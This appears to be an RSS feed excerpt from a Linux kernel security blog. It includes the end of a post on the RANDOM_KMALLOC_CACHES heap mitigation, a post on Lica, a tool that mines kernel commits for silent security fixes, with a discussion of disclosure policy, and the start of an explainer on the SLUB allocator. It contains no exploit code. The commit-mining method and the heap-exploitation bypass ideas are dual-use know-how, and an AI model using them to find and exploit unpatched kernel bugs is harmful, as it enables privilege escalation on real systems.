<p>Additionally, there are a couple other mitigations out there that look to mitigate heap exploitation in different ways. This includes grsecurity&rsquo;s AUTOSLAB<a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">[1]</a> and the experimental mitigations being used on kCTF by Jann Horn and Matteo Rizzo (which I&rsquo;d love to get into here, perhaps another post?!)<a href="https://github.com/thejh/linux/blob/slub-virtual-v6.1-lts/MITIGATION_README">[2]</a>. These could potentially see more uptake in the long run than <code>RANDOM_KMALLOC_CACHES</code>, or vice versa.</p>
<p>But <em>if</em> we were interested in tackling heap exploitation in a <code>RANDOM_KMALLOC_CACHES</code> environment, what might it look like? As we mentioned, this implementation focuses on the slab allocator and doesn&rsquo;t really touch the page allocator. As a result, the kernel is still vulnerable to cache reuse and overflow attacks.</p>
<p>So perhaps we see a world where &ldquo;generic techniques&rdquo; shift to finding new page allocator feng shui primitives, which has had less focus, to streamline the cache reuse/overflow approaches and gain LPE or perhaps to leak the random seed.</p>
<p>It&rsquo;s hard to say this early on, and without spending more time on the problem, whether we&rsquo;d shift into a new norm of generic techniques and approaches for page allocator feng shui as a result of this kind of slab hardening, or whether due to the constraints that&rsquo;s simply infeasible and the shift will be to more bespoke chains per bug (which could be considered quite a win for hardening&rsquo;s sake).</p>
<p>That said, I&rsquo;m sure the same was said about previous hardening features so who knows!</p>
<hr>
<ol>
<li><a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game</a></li>
<li><a href="https://github.com/thejh/linux/blob/slub-virtual-v6.1-lts/MITIGATION_README">https://github.com/thejh/linux/blob/slub-virtual-v6.1-lts/MITIGATION_README</a></li>
</ol>
<h2 id="wrapping-up">Wrapping Up</h2>
<p><img src="https://sam4k.com/content/images/2023/11/did_we_make_it.gif" alt=""></p>
<p>Wow, we made it to the end! A 4k word deep dive into a new kernel mitigation certainly is one way to get back into the swing of things, hopefully it made a good read though :)</p>
<p>We talked about the new kernel mitigation <code>RANDOM_KMALLOC_CACHES</code> and gave some context into the problems its trying to address. Loaded with that information we explored the implementation and how that might impact current heap exploitation techniques.</p>
<p>I would have liked to have spent more time tinkering with the mitigation in anger and perhaps including some demos or experiments, but being realistic about my time and availability, I figured it&rsquo;d be good to get this out rather than <em>maybe</em> get that out.</p>
<p>That said, maybe I&rsquo;ll try write up some old heap ndays on a <code>RANDOM_KMALLOC_CACHES=y</code> system to try and demonstrate the different approaches required. That sounds quite fun!</p>
<p>Equally, I quite liked doing a breakdown and review of a new kernel feature, so perhaps I&rsquo;ll do some more of that going forward (maybe the kCTF experimental mitigations???).</p>
<p>Anyways, you&rsquo;ve endured enough of my waffling, thanks for reading! As always feel free to <a href="https://twitter.com/sam4k1">@me</a> if you have any questions, suggestions or corrections :)</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Analysing Linux Kernel Commits</title><description>Tag along as I talk about a half finished project, looking at analysing Linux kernel commits for interesting security fixes.</description><link>https://sam4k.com/analysing-linux-kernel-commits/</link><guid isPermaLink="false">63de782692020209c38fca22</guid><category>linux</category><category>kernel</category><category>vr</category><dc:creator>sam4k</dc:creator><pubDate>Tue, 07 Feb 2023 20:01:23 +0000</pubDate><media:content url="https://sam4k.com/content/images/2023/02/detective_pik.gif" medium="image"/><content:encoded><![CDATA[<p>It&rsquo;s been a while, hasn&rsquo;t it? This post is going to be a bit of a change of pace from usual, as its actually covering some research from last year I ended up dropping.</p>
<p>The plan was to do some analysis of Linux kernel commits, to determine the feasibility of automating the process of finding interesting and potentially exploitable vulnerabilities, hopefully putting a novel poc or two together.</p>
<p>However, between both IRL circumstances and simply underestimating the time involved, this has dragged on more than I&rsquo;d like for a blog post to take and I&rsquo;m eager to move onto new things. But instead of putting it on the back burner, AKA never to see the light of day again, I thought I&rsquo;d share the tool I ended up writing and discuss some background behind it as well as my own takeaways during my time working on this stuff.</p>
<p>So in this post I&rsquo;ll talk a little about the background behind the motivations for looking into this and why kernel security fixes is an interesting topic. Then I&rsquo;ll do a quick tl;dr on the tool, Lica (<strong>Li</strong>nux <strong>C</strong>ommit <strong>A</strong>nalyser), I wrote and share some takeaways.</p>
<h2 id="disclaimer">Disclaimer</h2>
<p><img src="https://sam4k.com/content/images/2023/01/hold_up.gif" alt=""></p>
<p>Before we dive into things, some of the topics and issues I cover in this post are both complex and contentious. I want to highlight that I am by no means an expert on these things, and my thoughts here are from the experiences (and biases) of a security researcher.</p>
<p>Where there are gaps in my understanding or knowledge, I&rsquo;ll try to the highlight them, and if anyone has any corrections or additional info please let me know, thank you!</p>
<h2 id="content">Content</h2>
<ul>
<li><a href="#background">Background</a>
<ul>
<li><a href="#kernel-dev-tldr">kernel dev tl;dr</a></li>
<li><a href="#on-silent-security-fixes">on (silent) security fixes</a></li>
<li><a href="#the-plan">the plan</a></li>
</ul>
</li>
<li><a href="#lica">Lica</a></li>
<li><a href="#takeaways">Takeaways</a>
<ul>
<li><a href="#on-disclosures">On Disclosures</a></li>
</ul>
</li>
<li><a href="#conclusion">Conclusion</a></li>
</ul>
<h2 id="background">Background</h2>
<p><img src="https://sam4k.com/content/images/2023/02/lets_get_into_it.gif" alt=""></p>
<p>The original motivation behind this research stems from a somewhat contentious and longstanding topic of discussion amongst the Linux kernel community regarding the handling of security fixes, such as instances of &ldquo;silent security fixes&rdquo;.</p>
<p>First of all, to give some context to what we&rsquo;re talking about, let&rsquo;s do a quick tl;dr on kernel development and some of the terms mentioned so we&rsquo;re all up to speed! (feel free to skip)</p>
<h3 id="kernel-dev-tldr">kernel dev tl;dr</h3>
<p>&ldquo;The Linux kernel is a free and open-source, monolithic, modular, multitasking, Unix-like operating system kernel [&hellip;] Day-to-day development discussions take place on the <a href="https://en.wikipedia.org/wiki/Linux_kernel_mailing_list">Linux kernel mailing list</a> (LKML). Changes are tracked using the version control system <a href="https://en.wikipedia.org/wiki/Git">git</a>&rdquo; <a href="https://en.wikipedia.org/wiki/Linux_kernel">[1]</a></p>
<p>Specifically for a project using git, we can track the changes made by looking at the commits. A commit describes a set of changes made to the project by an author. If we look at projects on GitHub for example, we can see this. As of writing, the <a href="https://github.com/torvalds/linux">Linux kernel source tree</a> mirror on GitHub has 1,154,596 commits that <a href="https://github.com/torvalds/linux/commits/master">we can peruse</a>!</p>
<p>That&rsquo;s a lot of changes, right? The Linux kernel has guidelines and rules about submitting patches<a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">[2]</a>, but typically a commit is a logically cohesive set of changes (i.e. you won&rsquo;t see a bunch of different fixes for different parts of the kernel in one commit, I hope anyway).</p>
<p>All these changes are organised into releases, which you can read about over at <a href="https://www.kernel.org/category/releases.html">kernel.org</a>[3], with new mainline kernels being releases every 9-10 weeks.</p>
<p>Important to note is the concept of <strong>backporting</strong>, whereby bug fixes introduced in latest releases are applied to older kernel releases as well. There are several long-term maintenance (aka LTS) kernel releases, to designate support for older kernels.</p>
<h3 id="on-silent-security-fixes">on (silent) security fixes</h3>
<p><img src="https://sam4k.com/content/images/2023/01/shh.gif" alt=""></p>
<p>There&rsquo;s been lots of discussion surrounding security fixes and how they should be handled in relation to non-security fixes in the kernel, and this dialogue has understandably evolved over the years as our concept and understanding of security has too.</p>
<p>It&rsquo;s a complex topic and to over simplify the arguments, on either extreme of the axis you may have folks saying all fixes should be treated equally, while others would argue security fixes need to be dealt with in a specific way, highlighting the impact etc.</p>
<p>A recurring topic in this space is the concept of &ldquo;silent security fixes&rdquo;, where a commit fixing a potentially exploitable vulnerability <em>intentionally</em> omits information regarding the security implications/reasons behind the fix.</p>
<p>This has been up for debate within the community as far back, at least, as 2008 as we can seem from this post on the <a href="https://seclists.org/fulldisclosure/">Full Disclosure</a> mailing list from 2008, titled &ldquo;<a href="https://seclists.org/fulldisclosure/2008/Jul/276">Linux&rsquo;s unofficial security-through-coverup policy</a>&rdquo; by <a href="https://twitter.com/spendergrsec">@spendergrsec</a>.</p>
<p>Now as I mentioned earlier, a lot has changed since then, and our perception of security has come a long way since then. However over the years there have still been cases of, at worst, silent security fixes or, at best, inconsistency in the handling of security fixes[5][6][7][8].</p>
<h3 id="the-plan">the plan</h3>
<p><img src="https://sam4k.com/content/images/2023/02/piqued_interest.gif" alt=""></p>
<p>Putting this altogether, I was interested in analysing Linux kernel commits in a somewhat automated way such that I could filter for security fixes and explore trends.</p>
<p>With full understanding that I&rsquo;m no data scientist or software engineer, I whipped up a quick (and very hacky) tool to delve around a bit and have some fun.</p>
<hr>
<ol>
<li><a href="https://en.wikipedia.org/wiki/Linux_kernel">https://en.wikipedia.org/wiki/Linux_kernel</a></li>
<li><a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">https://www.kernel.org/doc/html/latest/process/submitting-patches.html</a></li>
<li><a href="https://www.kernel.org/category/releases.html">https://www.kernel.org/category/releases.html</a></li>
<li><a href="https://github.com/hardenedlinux/grsecurity-101-tutorials/blob/master/kernel_vuln_exp.md#silent-fixes-from-linux-kernel-community--welcome-to-add-more-for-fun">https://github.com/hardenedlinux/grsecurity-101-tutorials/blob/master/kernel_vuln_exp.md#silent-fixes-from-linux-kernel-community&ndash;welcome-to-add-more-for-fun</a></li>
<li><a href="https://arstechnica.com/information-technology/2013/05/critical-linux-vulnerability-imperils-users-even-after-silent-fix/">https://arstechnica.com/information-technology/2013/05/critical-linux-vulnerability-imperils-users-even-after-silent-fix/</a></li>
<li><a href="https://seclists.org/oss-sec/2022/q2/134">CVE-2022-1786</a> was UAF leading to LPE, with no mention in the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-5.10.y&amp;id=29f077d070519a88a793fbc70f1e6484dc6d9e35">fix commit</a></li>
<li><a href="https://seclists.org/oss-sec/2022/q4/30">CVE-2022-2602</a> was a UAF leading to LPE, with no mention in the <a href="https://github.com/torvalds/linux/commit/0091bfc81741b8d3aeb3b7ab8636f911b2de6e80">fix commit</a></li>
<li><a href="https://seclists.org/oss-sec/2021/q3/181">CVE-2021-41073</a> was disclosed by <a href="https://twitter.com/chompie1337">@chompie1337</a>, although the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=16c8d2df7ec0eed31b7d3b61cb13206a7fb930cc">fix commit</a> has no mention of the exploitability and they also asked her to use a non-security related email for the &ldquo;Reported-by&rdquo; ack (as mentioned in <a href="https://twitter.com/chompie1337">@chompie1337</a>&rsquo;s article <a href="https://s3.eu-west-1.amazonaws.com/www.thinkst.com/thinkstscapes/ThinkstScapes-2022-Q1-highres.pdf">here</a>)</li>
</ol>
<h2 id="lica">Lica</h2>
<p><img src="https://sam4k.com/content/images/2023/01/digusted_screen.gif" alt=""></p>
<p>get ready for some peak xdev-ctf-poc-tier code</p>
<p>Let&rsquo;s talk about the tool! I&rsquo;ll try keep this brief, both for my dignity and your sanity. I put together this tool using Python to parse kernel commits and try filter them for interesting security related fixes as well as any interesting stats along the way.</p>
<p><a href="https://github.com/sam4k/lica">sam4k/lica</a></p>
<p>Thanks to the kernel patch submission guidelines<a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">[1]</a>, there&rsquo;s some level of consistency in what to expect a commit to contain, which helps us filter down the 34000 or so commits in the last 6 months to around 135 possible security fixes - neat!</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Commit...... | Subsystem......... | Hits.................................... | CVE............. | Reporter.......................................... | Coverage.......
</span></span><span class="line"><span class="cl">----------------------------------------------------------------------------------------------------------------------------------------------------------------------
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">331cd9461412 | btrfs              | use-after-free                           |                  | Ye Bin &lt;yebin10@huawei.com&gt;                        | linux-5.15.90, linux-5.10.165, linux-5.4.230
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">cf6531d98190 | ksmbd              | use-after-free                           |                  | zdi-disclosures@trendmicro.com # ZDI-CAN-17816     | N/A            
</span></span><span class="line"><span class="cl">...          
</span></span><span class="line"><span class="cl">----------------------------------------------------------------------------------------------------------------------------------------------------------------------
</span></span><span class="line"><span class="cl">Now For The Stats...
</span></span><span class="line"><span class="cl">----------------------------------------------------------------------------------------------------------------------------------------------------------------------
</span></span><span class="line"><span class="cl">[+] 133 commits where matched from 2448 fixes, over 33487 commits.
</span></span><span class="line"><span class="cl">[+] 36 / 133 listed a reporter.
</span></span><span class="line"><span class="cl">[+] 2 / 133 mentioned a CVE.
</span></span><span class="line"><span class="cl">[+] Breakdown by category:
</span></span><span class="line"><span class="cl">|---- UAF: 95
</span></span><span class="line"><span class="cl">|---- Races: 22
</span></span><span class="line"><span class="cl">|---- Generic: 15
</span></span><span class="line"><span class="cl">|---- Info Leak: 10
</span></span><span class="line"><span class="cl">|---- Stack Overflow: 2
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">[+] Breakdown by module:
</span></span><span class="line"><span class="cl">|---- mm: 11
</span></span><span class="line"><span class="cl">|---- wifi: 10
</span></span><span class="line"><span class="cl">|---- drm: 8
</span></span><span class="line"><span class="cl">|---- media: 6
</span></span><span class="line"><span class="cl">|---- net: 5
</span></span><span class="line"><span class="cl">|---- cifs: 4
</span></span><span class="line"><span class="cl">|---- io_uring: 4
</span></span><span class="line"><span class="cl">...
</span></span></code></pre></div><p>output for the last 6 months or so, checking for coverage in latest 5.15, 5.10, 5.4 at the time</p>
<p>Above is a sample output from Lica, analysing kernel commits over the past 180 days. Here I&rsquo;ve used a really basic approach of looking for fixes via keyword in the commit summary phrase and then further filtering those fixes by looking for hits in a dictionary of common bug classes/terminology, grouped by category.</p>
<p>A (slightly) more nuanced approach, looking at some of the &ldquo;silent fixes&rdquo; from earlier, would be to grep for typical <em>causes</em> for bug classes + the omission of bug classes. A simple example might be <code>check.*len</code> for missing length checks.</p>
<p>It&rsquo;s worth noting that while we can use a basic dictionary or even filter by specific reporters (I&rsquo;m looking at you ZDI), using a bug cause focused dictionary (that omits security-centric terms) yields just as many results.</p>
<p>While more false positives, I think this reiterates that a determined attacker doesn&rsquo;t need to just grep for &ldquo;buffer overflow privesc&rdquo; or a CVE to find potentially exploitable vulnerabilities. Whether that&rsquo;s manually enumerating commits or using an approach like this which takes a few hours to put together, which makes me wonder why we have cases such as a researcher being ask to use a non security related email for the &ldquo;Reported-by&rdquo; ack[2]??</p>
<p>Back to Lica, I also include a naive check to see if a particular kernel release has the patch, for checking older LTS kernels for backports (the <code>Coverage</code> column). There&rsquo;s no doubt an easier and more reliable way to do this, but hey-ho, this did the trick for now.</p>
<p>Anyways, I tried to make this somewhat extensible and configurable, so I&rsquo;ve chucked it up on GitHub in case anyone is interested in having a play with it. You&rsquo;ve been warned about the quality!</p>
<hr>
<ol>
<li><a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">https://www.kernel.org/doc/html/latest/process/submitting-patches.html</a></li>
<li><a href="https://seclists.org/oss-sec/2021/q3/181">CVE-2021-41073</a> was disclosed by <a href="https://twitter.com/chompie1337">@chompie1337</a>, although the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=16c8d2df7ec0eed31b7d3b61cb13206a7fb930cc">fix commit</a> has no mention of the exploitability and they also asked her to use a non-security related email for the &ldquo;Reported-by&rdquo; ack (as mentioned in <a href="https://twitter.com/chompie1337">@chompie1337</a>&rsquo;s article <a href="https://s3.eu-west-1.amazonaws.com/www.thinkst.com/thinkstscapes/ThinkstScapes-2022-Q1-highres.pdf">here</a>)</li>
</ol>
<h2 id="takeaways">Takeaways</h2>
<p><img src="https://sam4k.com/content/images/2023/02/feeling_takeaway.gif" alt=""></p>
<p>Despite not getting to spend much time fine tuning or tweaking the tool do some in-depth analysis, it&rsquo;s been a fun little project and broaches an important discussion.</p>
<p>It does feel like, as a security researcher, there is still a lack of transparency and consistency in the processes and handling of security disclosures and fixes in the kernel.</p>
<p>Whether there&rsquo;s intentional omission of security relevant information or just a difference in opinion on what constitutes relevant information, the end result is still a lack of consistency in how reported security issues are handled.</p>
<p>For example, I wrote about my experience disclosing a kernel vulnerability at the beginning of 2022<a href="https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/">[1]</a>. While the process was a bit convoluted for me, after getting in touch with the right folks, I had no issues with communication and the commit referenced the reporter, CVE and vulnerability being fixed<a href="https://github.com/torvalds/linux/commit/9aa422ad326634b76309e8ff342c246800621216">[2]</a>.</p>
<p>However, as I touched on earlier in the post, other researchers have had different experiences and the resulting patches can vary in their security relevant content.</p>
<h3 id="on-disclosures">On Disclosures</h3>
<p><img src="https://sam4k.com/content/images/2023/02/dont-make-me-go-back.gif" alt=""></p>
<p>If you want to report a kernel vulnerability, you&rsquo;ll typically end up staring at two pages:</p>
<ol>
<li>The official kernel documentation on &ldquo;Security Bugs&rdquo;<a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html">[3]</a>[4],</li>
<li>The <code>linux-distros</code> mailing list wiki page<a href="https://oss-security.openwall.org/wiki/mailing-lists/distros#how-to-use-the-lists">[5]</a></li>
</ol>
<p>The tl;dr here is the kernel security team&rsquo;s focus is solely on finding and applying a fix for security bugs. To allocate a CVE, inform vendors of the security impact (LPE, RCE etc.) then you need to coordinate with the <code>linux-distros</code> list too.</p>
<p>There&rsquo;s been a history of friction between the policies of the two bodies, with security researchers getting caught up between the two. The most recent instance being the public disclosure of CVE-2023-0179 over on oss-security<a href="https://seclists.org/oss-sec/2023/q1/22">[6]</a>.</p>
<p>Unfortunately I don&rsquo;t fully understand the root cause of the misunderstanding. As Solar Designer points out, this seems to stem from a policy change made to accommodate the kernel security team<a href="https://www.openwall.com/lists/oss-security/2022/05/24/1">[8]</a>, as part of a wider discussion on <code>linux-distros</code> policy last year<a href="https://seclists.org/oss-sec/2022/q2/99">[9]</a>, but I&rsquo;m not entirely sure what policy this disclosure broke on the kernel documentation for &ldquo;Security Bugs&rdquo;<a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html">[3]</a>.</p>
<p>Beyond highlighting the work required on the part of the researcher to make sure they follow the right steps and policies, this instance also shows where this rift might end up if it things carry on the way they are, with Solar Designer commenting:</p>
<blockquote>
<p>It may well be the last straw that will result in Linux kernel documentation getting updated so that reporters would not be instructed to contact linux-distros anymore (or would even be instructed not to?)  On one hand, this is bad.  On the other, everyone is tired of the inconsistencies and the drama.</p>
</blockquote>
<p>Solar Designer then goes on to explain a potential solution to ensure oss-security still keeps up-to-date with kernel security issues if things do go south:</p>
<blockquote>
<p>I suppose we (oss-security community?) could want to setup a crawler detecting likely security issues on Linux kernel mailing lists and among Linux kernel commits (including branches).  This could detect even more issues than are being brought to linux-distros and oss-security now.</p>
</blockquote>
<p>While somewhat ironic given the topic of this post (not that my code is fit for scale lol), its a shame that there&rsquo;s still discord regarding the handling of kernel security issues when this is a debate that&rsquo;s been going on for so many years at this point.</p>
<p>I don&rsquo;t have all the information or experience to suggest any solutions for a decades long pain point, but I do hope there&rsquo;s one out there and we can find it soon.</p>
<p>Transparency and consistency surrounding these processes helps to encourage researchers to participate in coordinated vulnerability disclosure for kernel vulns. Having more clarity around the handling and state of security fixes should also help vendors and such too, as well as help us as a community to continue to progress with regards to our attitude and approach to security.</p>
<hr>
<ol>
<li><a href="https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/">https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/</a></li>
<li><a href="https://github.com/torvalds/linux/commit/9aa422ad326634b76309e8ff342c246800621216">https://github.com/torvalds/linux/commit/9aa422ad326634b76309e8ff342c246800621216</a></li>
<li><a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html">https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html</a></li>
<li>small note, the first result on google for me is actually an older copy, from the 4.14 kernel which omits some clarity found in the latest versions</li>
<li><a href="https://oss-security.openwall.org/wiki/mailing-lists/distros#how-to-use-the-lists">https://oss-security.openwall.org/wiki/mailing-lists/distros#how-to-use-the-lists</a></li>
<li><a href="https://seclists.org/oss-sec/2023/q1/22">https://seclists.org/oss-sec/2023/q1/22</a></li>
<li><a href="https://www.openwall.com/lists/oss-security/2022/05/24/1">https://www.openwall.com/lists/oss-security/2022/05/24/1</a></li>
<li><a href="https://seclists.org/oss-sec/2022/q2/99">https://seclists.org/oss-sec/2022/q2/99</a></li>
<li><a href="https://seclists.org/oss-sec/2022/q4/221">https://seclists.org/oss-sec/2022/q4/221</a></li>
</ol>
<h2 id="conclusion">Conclusion</h2>
<p><img src="https://sam4k.com/content/images/2023/02/calming.gif" alt=""></p>
<p>Well, this one was a bit of a change of pace for me and was a step out of my comfort zone, considering I normally focus on more objective, technical subjects. That probably explains why it took so much longer to write!</p>
<p>Hopefully I didn&rsquo;t stir the pot too much; my goals for this post were to share some takeaways from a project that otherwise would have been relegated to the recycling bin as well as shed some light on a relevant and important topic within the community.</p>
<p>Despite my criticism of the current status quo, I have a lot of respect for the time and effort put in by all of those involved in the Linux kernel community.</p>
<p>Fingers crossed this was interesting for those of you that made it this far, but don&rsquo;t fear, I&rsquo;ve got some more technical posts lined up for both kernel exploitation and internals!</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Linternals: The Slab Allocator</title><description>This time we&amp;#39;re going to build on that and introduce another memory allocator found within the Linux kernel, the slab allocator, and it&amp;#39;s various flavours. So buckle up as we dive into the exciting world of SLABs, SLUBs and SLOBs.</description><link>https://sam4k.com/linternals-memory-allocators-0x02/</link><guid isPermaLink="false">6311d87a92020209c38fb7ba</guid><category>linux</category><category>kernel</category><category>memory</category><dc:creator>sam4k</dc:creator><pubDate>Wed, 09 Nov 2022 15:04:00 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/09/linternals.gif" medium="image"/><content:encoded><![CDATA[<p>The monthly blog schedule has gone somewhat awry, but fear not, today we&rsquo;re diving back into our Linternals series on memory allocators!</p>
<p>I know it&rsquo;s been a while, I&rsquo;ve been sidetracked with the new job and some cool personal projects, so let&rsquo;s quickly highlight what we covered <a href="https://sam4k.com/linternals-memory-allocators-part-1">last time</a>:</p>
<ul>
<li>what we mean by memory allocators</li>
<li>key memory concepts such as pages, page frames, nodes and zones</li>
<li>piecing this together to explain the underlying allocator used by the Linux kernel, the buddy (or page) allocator, as well as touching on it&rsquo;s API, pros and cons</li>
</ul>
<p>This time we&rsquo;re going to build on that and introduce another memory allocator found within the Linux kernel, the slab allocator, and it&rsquo;s various flavours. So buckle up as we dive into the exciting world of SLABs, SLUBs and SLOBs.</p>
<p><img src="https://sam4k.com/content/images/2022/10/what_you_said-makes_no_sense.gif" alt=""></p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#0x03-the-slab-allocator">0x03 The Slab Allocator</a>
<ul>
<li><a href="#the-basics">The Basics</a></li>
<li><a href="#data-structures">Data Structures</a>
<ul>
<li><a href="#struct-kmemcache">struct kmem_cache</a></li>
<li><a href="#struct-kmemcachecpu">struct kmem_cache_cpu</a></li>
<li><a href="#struct-kmemcachenode">struct kmem_cache_node</a></li>
<li><a href="#struct-slab">struct slab</a></li>
<li><a href="#wrap-up">Wrap-up</a></li>
</ul>
</li>
<li><a href="#the-api">The API</a>
<ul>
<li><a href="#kmalloc-kfree">kmalloc &amp; kfree</a></li>
<li><a href="#kmemcachecreate">kmem_cache_create</a></li>
<li><a href="#kmemcachealloc">kmem_cache_alloc</a></li>
<li><a href="#cache-aliases">slab aliases</a></li>
</ul>
</li>
<li><a href="#seeing-it-in-action">Seeing It In Action</a>
<ul>
<li><a href="#procslabinfo">/proc/slabinfo</a></li>
<li><a href="#slabtop">slabtop</a></li>
<li><a href="#slabinfo">slabinfo</a></li>
<li><a href="#debugging">debugging</a></li>
<li><a href="#slxbtrace-ebpf">slxbtrace (ebpf)</a></li>
</ul>
</li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
</li>
<li><a href="#next-time">Next Time!</a></li>
</ul>
<h2 id="0x03-the-slab-allocator">0x03 The Slab Allocator</h2>
<p>The slab allocator is the another memory allocator used by the Linux kernel and, as we touched on last time, &ldquo;sits on top of the buddy allocator&rdquo;.</p>
<p>What I mean by this, is that while the slab allocator is another kernel memory allocator it doesn&rsquo;t replace the buddy allocator. Instead it introduces a new API and features for kernel developers (which we&rsquo;ll cover soon), but under the hood it uses the buddy allocator too.</p>
<p>So why use the slab allocator? Well, last time we touched on some of the issues and drawbacks with the buddy allocator. The purpose of the slab allocator is to<a href="https://www.kernel.org/doc/gorman/html/understand/understand011.html">[1]</a>:</p>
<ul>
<li>reduce internal fragmentation,</li>
<li>cache commonly used objects,</li>
<li>better utilise of hardware cache by aligning objects to the L1 or L2 caches</li>
</ul>
<p>So while the buddy allocator excels at allocating large chunks of physically contiguous memory, the slab allocator provides better performance to kernel developers for smaller and more common allocations (which happen more often than you might think!).</p>
<p>Before we dive into some more detail and explain how the kernel&rsquo;s slab allocator achieves this, I should highlight that the term &ldquo;slab allocator&rdquo; refers to a generic memory management implementation.</p>
<p>The Linux kernel actually has three such implementations: SLAB[2], SLUB and SLOB. SLUB is what you&rsquo;re likely to see on modern desktops and servers[3], so <strong>we&rsquo;ll be focusing on this implementation</strong> through out this post, but I&rsquo;ll touch on the others later.</p>
<p>If you&rsquo;re interested in its origins, slab allocation was first introduced by Jeff Bonwick back in the 90&rsquo;s and you can read his paper &ldquo;The Slab Allocator: An Object-Caching Kernel Memory Allocator&rdquo; over on USENIX.<a href="http://www.usenix.org/publications/library/proceedings/bos94/full_papers/bonwick.ps">[4]</a> [5]</p>
<hr>
<ol>
<li><a href="https://www.kernel.org/doc/gorman/html/understand/understand011.html">https://www.kernel.org/doc/gorman/html/understand/understand011.html</a></li>
<li>Note that &ldquo;slab allocator&rdquo; != &ldquo;slab&rdquo; != &ldquo;SLAB&rdquo;, confusing ik</li>
<li>SLUB has been the default since 2.6.23 (~2008), so by likely I mean <em><strong>very likely</strong></em></li>
<li><a href="https://www.usenix.org/biblio-4248">http://www.usenix.org/publications/library/proceedings/bos94/full_papers/bonwick.ps</a></li>
<li>Thanks <a href="https://infosec.exchange/web/@bsmaalders@mas.to">@bsmaalders@mas.to</a> for the reminder to include this here :)</li>
</ol>
<h3 id="the-basics">The Basics</h3>
<p><img src="https://sam4k.com/content/images/2022/10/let_us_begin.gif" alt=""></p>
<p>At a high level, there&rsquo;s 3 main parts to the SLUB allocator: <strong>caches</strong>, <strong>slabs</strong> and <strong>objects</strong>.</p>
<p><img src="https://sam4k.com/content/images/2022/10/simple_cache.png" alt=""></p>
<p>As we can see, these form a pretty straightforward hierarchy. <strong>Objects</strong> (i.e. stuff being allocated by the kernel) of a particular type or size are organised into <strong>caches</strong>.</p>
<p><strong>Objects</strong> belonging to a <strong>cache</strong> are further grouped into <strong>slabs</strong>, which will be of a fixed size and contain a fixed number of <strong>objects.</strong></p>
<p><strong>Objects</strong> in this context are just allocations of a particular size. For example, when a process opens a <code>seq_file</code><a href="https://www.kernel.org/doc/html/latest/filesystems/seq_file.html">[1]</a> in Linux, the kernel will allocate space for <code>[struct seq_operations](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/seq_file.h#L32)</code> using the slab allocator API. This is will be a 32 byte object.</p>
<p><img src="https://sam4k.com/content/images/2022/10/simple_cache_meta-2.png" alt=""></p>
<p>Among other things, the cache will keep tabs on which slabs are full, which slabs a partially full and when slabs are empty. Free objects within a slab will form a linked list, pointing to the next free object within that slab.</p>
<p>So when the kernel wants to make an allocation via the SLUB allocator, it will find the right cache (depending on type/size) and then find a partial slab to allocate that object.</p>
<p>If there are no partial or free slabs, the SLUB allocator will allocate some new slabs via the buddy allocator. Yep, there it is, we&rsquo;re full circle now. The slabs themselves are allocated and freed using the buddy allocator we touched on last time.</p>
<p>Knowing this we can deduce that each slab is at least <code>PAGE_SIZE</code> bytes and is physically contiguous; we&rsquo;ll touch more on the details in a bit!</p>
<hr>
<ol>
<li><a href="https://www.kernel.org/doc/html/latest/filesystems/seq_file.html">https://www.kernel.org/doc/html/latest/filesystems/seq_file.html</a></li>
</ol>
<h3 id="data-structures">Data Structures</h3>
<p><img src="https://sam4k.com/content/images/2022/10/about_to_get_real.gif" alt=""></p>
<p>In the last section we covered slab allocator 101 - a simplified overview of caches, slabs and objects. Surprise, surprise: the kernel implementation is a tad more complex!</p>
<p>I think the approach I&rsquo;ll take here is to just dive right into the data structures behind the SLUB implementation and we&rsquo;ll expand from there and see how it goes?!</p>
<p>So let&rsquo;s give a quick overview at some of the kernel data structures we&rsquo;re interested in when looking at the SLUB implementation:</p>
<ul>
<li><code>[struct kmem_cache](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L90)</code>: represents a specific cache of objects, storing all the metadata and info necessary for managing the cache</li>
<li><code>[struct kmem_cache_cpu](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48)</code>: this is a per-cpu structure which represents the &ldquo;active&rdquo; slab for a particular <code>kmem_cache</code> on that CPU (I&rsquo;ll explain this soon, dw!)</li>
<li><code>[struct kmem_cache_node](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L741)</code>: this is a per-node (NUMA node) structure which tracks the partial and full slabs for a particular <code>kmem_cache</code> on that node that aren&rsquo;t currently &ldquo;active&rdquo;</li>
<li><code>[struct slab](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9)</code>: this structure, as you probably guessed, represents an individual slab and was introduced in 5.17<a href="https://lwn.net/Articles/881039/">[1]</a> (previously this information would be accessed directly from <code>[struct page](https://elixir.bootlin.com/linux/v5.17/source/include/linux/mm_types.h#L72)</code>, but more on that soon!)</li>
</ul>
<h4 id="struct-kmemcache">struct kmem_cache</h4>
